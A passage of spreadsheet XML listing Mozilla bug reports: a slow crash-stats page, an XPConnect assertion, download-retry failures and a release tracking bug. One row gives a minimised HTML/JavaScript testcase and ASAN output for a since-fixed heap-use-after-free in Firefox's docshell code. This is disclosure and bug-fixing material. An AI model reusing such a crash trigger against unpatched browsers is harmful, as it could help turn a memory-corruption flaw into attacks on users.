          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3656" t="inlineStr">
        <is>
          <t>[stage][fromAutomation][regression]</t>
        </is>
      </c>
      <c r="Q3656" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3656" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3656" t="n">
        <v>1</v>
      </c>
      <c r="U3656" t="n">
        <v>0</v>
      </c>
      <c r="V3656" t="n">
        <v>6</v>
      </c>
      <c r="W3656" t="inlineStr">
        <is>
          <t>Not sure what changed on stage - The reports for signatures are slow to load. I've also seen a few timeouts where socorro displays an error stating the information could not load.
Our automated tests flagged this as an issue, information in the reports is taking up to +180 seconds to load at times.
Steps to reproduce:
0. choose a signature from a top crashers report
1. navigate to the #tab-reports tab
2. navigate to the #tab-correlations tab
Actual:
Signature reports are slow to load
The reports tab sometimes times out and the error "Unable to load ..." is displayed.
The correlations tab consistently displays the error, "Unable to load correlations. Please try again later."</t>
        </is>
      </c>
      <c r="X3656" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3657">
      <c r="A3657" t="n">
        <v>679494</v>
      </c>
      <c r="B3657" t="inlineStr">
        <is>
          <t>2011-08-16 13:57:35 -0700</t>
        </is>
      </c>
      <c r="C3657" t="inlineStr">
        <is>
          <t>"compartment mismatched" when listening message event</t>
        </is>
      </c>
      <c r="D3657" t="inlineStr">
        <is>
          <t>2015-01-14 05:32:31 -0800</t>
        </is>
      </c>
      <c r="E3657" t="n">
        <v>1</v>
      </c>
      <c r="F3657" t="n">
        <v>1</v>
      </c>
      <c r="G3657" t="n">
        <v>3</v>
      </c>
      <c r="H3657" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3657" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3657" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3657" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3657" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3657" t="inlineStr"/>
      <c r="Q3657" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3657" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3657" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T3657" t="n">
        <v>1</v>
      </c>
      <c r="U3657" t="n">
        <v>0</v>
      </c>
      <c r="V3657" t="n">
        <v>25</v>
      </c>
      <c r="W3657" t="inlineStr">
        <is>
          <t>Assertion failure: compartment mismatched, at /home/pouf/mozilla-central/js/src/jscntxtinlines.h:120
when running the following script in JS console:
var w=top.opener.gBrowser.contentDocument.defaultView; 
w.addEventListener("message", function(event) {
  alert(event.data);
}, false);
w.postMessage("test");
I suppose that it only occurs when we listen to `message` event from another compartment than the event source document.</t>
        </is>
      </c>
      <c r="X3657" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3658">
      <c r="A3658" t="n">
        <v>696945</v>
      </c>
      <c r="B3658" t="inlineStr">
        <is>
          <t>2011-10-24 16:20:33 -0700</t>
        </is>
      </c>
      <c r="C3658" t="inlineStr">
        <is>
          <t>retry downloads of builds, tests, and symbols on mozilla-tests</t>
        </is>
      </c>
      <c r="D3658" t="inlineStr">
        <is>
          <t>2013-11-15 12:06:32 -0800</t>
        </is>
      </c>
      <c r="E3658" t="n">
        <v>1</v>
      </c>
      <c r="F3658" t="n">
        <v>1</v>
      </c>
      <c r="G3658" t="n">
        <v>5</v>
      </c>
      <c r="H3658" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3658" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3658" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3658" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3658" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3658" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3658" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3658" t="inlineStr">
        <is>
          <t>[retry][surf]</t>
        </is>
      </c>
      <c r="Q3658" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3658" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3658" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3658" t="n">
        <v>1</v>
      </c>
      <c r="U3658" t="n">
        <v>0</v>
      </c>
      <c r="V3658" t="n">
        <v>2</v>
      </c>
      <c r="W3658" t="inlineStr">
        <is>
          <t>Today, someone restart apache without warning and it caused some major tree horkage.  We should retry downloading the build, test and symbols files when this happens. 
The log looked like.  This turned the tests red instead of purple and did not set RETRY, so the build never retried.
--15:49:35--  http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-win32-debug/1319490284/firefox-10.0a1.en-US.win32.crashreporter-symbols.zip
           =&gt; `firefox-10.0a1.en-US.win32.crashreporter-symbols.zip'
Resolving stage.mozilla.org... 10.2.74.116
Connecting to stage.mozilla.org|10.2.74.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,744,133 (22M) [application/zip]
    0K ........                                               2%   12.32 MB/s
15:49:35 (12.32 MB/s) - Connection closed at byte 565534. Retrying.
--15:49:35--  http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-win32-debug/1319490284/firefox-10.0a1.en-US.win32.crashreporter-symbols.zip
  (try: 2) =&gt; `firefox-10.0a1.en-US.win32.crashreporter-symbols.zip'
Connecting to stage.mozilla.org|10.2.74.116|:80... connected.
HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
Retrying.
--15:49:37--  http://stage.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-win32-debug/1319490284/firefox-10.0a1.en-US.win32.crashreporter-symbols.zip
  (try: 3) =&gt; `firefox-10.0a1.en-US.win32.crashreporter-symbols.zip'
Connecting to stage.mozilla.org|10.2.74.116|:80... failed: Connection refused.
Resolving stage.mozilla.org... 10.2.74.116
Connecting to stage.mozilla.org|10.2.74.116|:80... failed: Connection refused.
program finished with exit code 1
elapsedTime=3.594000
======== Finished download failed (results: 2, elapsed: 3 secs) ========</t>
        </is>
      </c>
      <c r="X3658" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3659">
      <c r="A3659" t="n">
        <v>422122</v>
      </c>
      <c r="B3659" t="inlineStr">
        <is>
          <t>2008-03-11 09:00:00 -0700</t>
        </is>
      </c>
      <c r="C3659" t="inlineStr">
        <is>
          <t>Tracking bug for Build and Release of FF 2.0.0.13</t>
        </is>
      </c>
      <c r="D3659" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3659" t="n">
        <v>1</v>
      </c>
      <c r="F3659" t="n">
        <v>1</v>
      </c>
      <c r="G3659" t="n">
        <v>5</v>
      </c>
      <c r="H3659" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3659" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3659" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3659" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3659" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3659" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3659" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3659" t="inlineStr"/>
      <c r="Q3659" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3659" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3659" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3659" t="n">
        <v>1</v>
      </c>
      <c r="U3659" t="n">
        <v>0</v>
      </c>
      <c r="V3659" t="n">
        <v>20</v>
      </c>
      <c r="W3659" t="inlineStr">
        <is>
          <t>We were given the "go" for this yesterday, so need to start builds asap.</t>
        </is>
      </c>
      <c r="X3659" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3660">
      <c r="A3660" t="n">
        <v>1536405</v>
      </c>
      <c r="B3660" t="inlineStr">
        <is>
          <t>2019-03-19 04:25:27 -0700</t>
        </is>
      </c>
      <c r="C3660" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsDocShell::GetChromeEventHandler</t>
        </is>
      </c>
      <c r="D3660" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:36 -0700</t>
        </is>
      </c>
      <c r="E3660" t="n">
        <v>1</v>
      </c>
      <c r="F3660" t="n">
        <v>1</v>
      </c>
      <c r="G3660" t="n">
        <v>3</v>
      </c>
      <c r="H3660" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3660" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3660" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3660" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L3660" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3660" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3660" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3660" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q3660" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3660" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3660" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T3660" t="n">
        <v>1</v>
      </c>
      <c r="U3660" t="n">
        <v>0</v>
      </c>
      <c r="V3660" t="n">
        <v>33</v>
      </c>
      <c r="W3660" t="inlineStr">
        <is>
          <t>Created attachment 9051944
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 68.0a1 (SourceStamp=8803315158232628b5a63ad1e2dc84b28da805eb). It requires the attached intro.xml and intro.xsl in the same directory loaded from a webserver. It works best if loaded in multiple tabs and might require a few attempts.
crash.html:
&lt;script&gt;
function start() {
    o1044=document.createElementNS('http://www.w3.org/1999/xhtml','form');
	o10=window.open('intro.xml','popup39','height=10,width=105,top=1,outerWidth=121,innerHeight=-393216,innerWidth=7602173,dependent');;
	o44=window.open('y','popup80','centerscreen,innerWidth=3,menubar,scrollbars');;
	document.documentElement.innerHTML='';
	o554=document.documentElement;
        o10.F={};o10.eval("F.o622=document.createElementNS('http://www.w3.org/1999/xhtml','div');");;
        o622 = o10.F.o622;
	o622.innerHTML="&lt;svg&gt;&lt;title xml=\"test-title\"&gt;&lt;/title&gt;&lt;defs&gt;&lt;font-face&gt;&lt;/font-face&gt;&lt;/defs&gt;&lt;g font-family=\"test-body-content\"&gt;&lt;text&gt;end&lt;/text&gt;&lt;g transform=\"translate\"&gt;&lt;g font-size=\"14\"&gt;&lt;g&gt;&lt;rect width=\"-6\"&gt;&lt;/rect&gt;&gt;&lt;rect fill=\"\"&gt;&lt;/rect&gt;&lt;/g&gt;&lt;/g&gt;&lt;/g&gt;&lt;text&gt;DRAFT&lt;/text&gt;&lt;/g&gt;&lt;/svg&gt;";
	o623=o622.firstChild.getElementsByTagName('*');;
	o637=o623[1];;
	o693=new IntersectionObserver(fun0,{});;
	o716=o637.ownerDocument;;
	o693.observe(o554);
	o10.open();
	o10.close();
        o907 = o10.document;
	o907.documentElement.appendChild(o1044);
        try{o716.appendChild(o907.documentElement);}catch(e){}
}
function fun0() {
	o1114=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');;
	o1044.appendChild(o1114);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==24153==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000209b00 at pc 0x7fbcedd8c7d8 bp 0x7ffe33fc6480 sp 0x7ffe33fc6478
READ of size 8 at 0x60c000209b00 thread T0 (Web Content)
    #0 0x7fbcedd8c7d7 in nsCOMPtr /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:517:7
    #1 0x7fbcedd8c7d7 in nsDocShell::GetChromeEventHandler(mozilla::dom::EventTarget**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1148
    #2 0x7fbce47179de in nsFrameLoader::MaybeCreateDocShell() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2011:21
    #3 0x7fbce471bbfd in nsFrameLoader::CheckForRecursiveLoad(nsIURI*) /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2249:8
    #4 0x7fbce470f1ed in CheckURILoad /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:575:10
    #5 0x7fbce470f1ed in nsFrameLoader::LoadURI(nsIURI*, nsIPrincipal*, nsIContentSecurityPolicy*, bool) /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:373
    #6 0x7fbce470dfd3 in nsFrameLoader::LoadFrame(bool) /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:339:10
    #7 0x7fbce859e48e in LoadSrc /builds/worker/workspace/build/src/dom/html/nsGenericHTMLFrameElement.cpp:201:17
    #8 0x7fbce859e48e in nsGenericHTMLFrameElement::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/html/nsGenericHTMLFrameElement.cpp:218
    #9 0x7fbce838c2fc in mozilla::dom::HTMLIFrameElement::BindToTree(mozilla::dom::Document*, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/html/HTMLIFrameElement.cpp:67:34
    #10 0x7fbce4767759 in nsINode::InsertChildBefore(nsIContent*, nsIContent*, bool) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1246:23
    #11 0x7fbce4772e24 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2361:14
    #12 0x7fbce53b00b9 in InsertBefore /builds/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1684:12
    #13 0x7fbce53b00b9 in AppendChild /builds/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1687
    #14 0x7fbce53b00b9 in mozilla::dom::Node_Binding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:1021
    #15 0x7fbce780d8f1 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3144:13
    #16 0x7fbceef3cd77 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #17 0x7fbceef3cd77 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #18 0x7fbceef3f332 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #19 0x7fbcefc29c0f in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #20 0x7fbcefbe2f81 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:238:19
    #21 0x7fbcefc09270 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:503:19
    #22 0x7fbceef3ddc9 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:508:14
    #23 0x7fbceef251a6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #24 0x7fbceef251a6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3075
    #25 0x7fbceef07238 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #26 0x7fbceef3d6e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #27 0x7fbceef3f332 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #28 0x7fbcefb50ee9 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2623:10
    #29 0x7fbce76a7d01 in mozilla::dom::IntersectionCallback::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Sequence&lt;mozilla::OwningNonNull&lt;mozilla::dom::DOMIntersectionObserverEntry&gt; &gt; const&amp;, mozilla::dom::DOMIntersectionObserver&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/IntersectionObserverBinding.cpp:833:8
    #30 0x7fbce4043128 in Call&lt;mozilla::dom::DOMIntersectionObserver *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/IntersectionObserverBinding.h:486:12
    #31 0x7fbce4043128 in Call&lt;mozilla::dom::DOMIntersectionObserver *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/IntersectionObserverBinding.h:508
    #32 0x7fbce4043128 in mozilla::dom::DOMIntersectionObserver::Notify() /builds/worker/workspace/build/src/dom/base/DOMIntersectionObserver.cpp:463
    #33 0x7fbce441a95b in mozilla::dom::Document::NotifyIntersectionObservers() /builds/worker/workspace/build/src/dom/base/Document.cpp:11525:17
    #34 0x7fbce44be9ab in applyImpl&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #35 0x7fbce44be9ab in apply&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #36 0x7fbce44be9ab in mozilla::detail::RunnableMethodImpl&lt;mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174
    #37 0x7fbce0065385 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #38 0x7fbce00a4a31 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1179:14
    #39 0x7fbce00ace3d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #40 0x7fbce136b34f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #41 0x7fbce12410ce in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #42 0x7fbce12410ce in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #43 0x7fbce12410ce in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #44 0x7fbcea695733 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #45 0x7fbceec5f20e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:933:20
    #46 0x7fbce12410ce in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #47 0x7fbce12410ce in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #48 0x7fbce12410ce in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #49 0x7fbceec5e39c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:771:34
    #50 0x55da48261834 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #51 0x55da48261834 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:265
    #52 0x7fbd03b35b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #53 0x55da48186ebc in _start (/home/nils/browser/firefox/firefox/firefox+0x2debc)
0x60c000209b00 is located 0 bytes inside of 120-byte region [0x60c000209b00,0x60c000209b78)
freed by thread T0 (Web Content) here:
    #0 0x55da4822e9e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fbcdfe6c311 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7fbcdfe68df9 in ~RemoveSkippableVisitor /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2540:3
    #3 0x7fbcdfe68df9 in nsPurpleBuffer::RemoveSkippable(nsCycleCollector*, js::SliceBudget&amp;, bool, bool, void (*)()) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2587
    #4 0x7fbcdfe6ccb6 in nsCycleCollector::ForgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2653:14
    #5 0x7fbcdfe7ada0 in nsCycleCollector_forgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3893:21
    #6 0x7fbce478b3cb in FireForgetSkippable(unsigned int, bool, mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1191:3
    #7 0x7fbce4792951 in CCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1859:5
    #8 0x7fbce0051df7 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #9 0x7fbce0051df7 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #10 0x7fbce00a4a31 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1179:14
    #11 0x7fbce00ace3d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #12 0x7fbce136b34f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #13 0x7fbce12410ce in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fbce12410ce in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fbce12410ce in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fbcea695733 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7fbceec5f20e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:933:20
    #18 0x7fbce12410ce in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fbce12410ce in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #20 0x7fbce12410ce in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #21 0x7fbceec5e39c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:771:34
    #22 0x55da48261834 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #23 0x55da48261834 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:265
    #24 0x7fbd03b35b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
previously allocated by thread T0 (Web Content) here:
    #0 0x55da4822ed63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55da482635fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7fbce487fb72 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7fbce487fb72 in NS_NewWindowRoot(nsPIDOMWindowOuter*) /builds/worker/workspace/build/src/dom/base/nsWindowRoot.cpp:334
    #4 0x7fbce41c7ab4 in nsGlobalWindowOuter::SetDocShell(nsDocShell*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2409:29
    #5 0x7fbce420b466 in nsGlobalWindowOuter::Create(nsDocShell*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:7759:11
    #6 0x7fbcedd7e060 in nsDocShell::EnsureScriptEnvironment() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:12055:19
    #7 0x7fbceddb17d0 in GetWindow /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3622:7
    #8 0x7fbceddb17d0 in non-virtual thunk to nsDocShell::GetWindow() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #9 0x7fbcede5ddc2 in nsSHistory::SetRootDocShell(nsIDocShell*) /builds/worker/workspace/build/src/docshell/shistory/nsSHistory.cpp:1513:55
    #10 0x7fbceddc2f99 in nsDocShell::InitSessionHistory() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4719:25
    #11 0x7fbcee53cee9 in nsWebBrowser::Create(nsIWebBrowserChrome*, nsIWidget*, mozilla::OriginAttributes const&amp;, mozilla::dom::BrowsingContext*) /builds/worker/workspace/build/src/toolkit/components/browser/nsWebBrowser.cpp:154:13
    #12 0x7fbce9c3cb9d in mozilla::dom::TabChild::Init(mozIDOMWindowProxy*) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:526:17
    #13 0x7fbce9b461bf in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, nsDocShellLoadState*, bool*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/dom/ipc/ContentChild.cpp:958:7
    #14 0x7fbce9c462b5 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, nsDocShellLoadState*, bool*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:922:14
    #15 0x7fbceeba0bd9 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsDocShellLoadState*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:755:24
    #16 0x7fbceeba5ec3 in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:367:10
